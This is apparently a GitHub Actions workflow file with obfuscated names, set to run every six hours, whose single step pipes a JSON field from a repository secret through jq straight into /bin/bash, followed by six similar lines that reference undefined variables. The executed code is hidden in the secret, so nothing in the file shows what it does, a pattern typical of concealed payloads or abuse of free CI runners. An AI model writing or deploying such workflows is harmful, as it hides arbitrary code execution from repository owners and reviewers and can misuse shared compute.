name: qianshuzhong8912

on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qianshuzhong8912
        env:
          kx04: ${{ secrets.kx04 }}
        run: |
          echo $kx04 | jq -r .wbxvm559 | /bin/bash
          echo $b23641 | jq -r .msez284 | /bin/bash
          echo $asmkr5560 | jq -r .cpfx9861 | /bin/bash
          echo $yro44 | jq -r .kfcad622 | /bin/bash
          echo $nyjb006 | jq -r .na3862 | /bin/bash
          echo $zlal3049 | jq -r .fq388 | /bin/bash
          echo $cy53275 | jq -r .iip69507 | /bin/bash

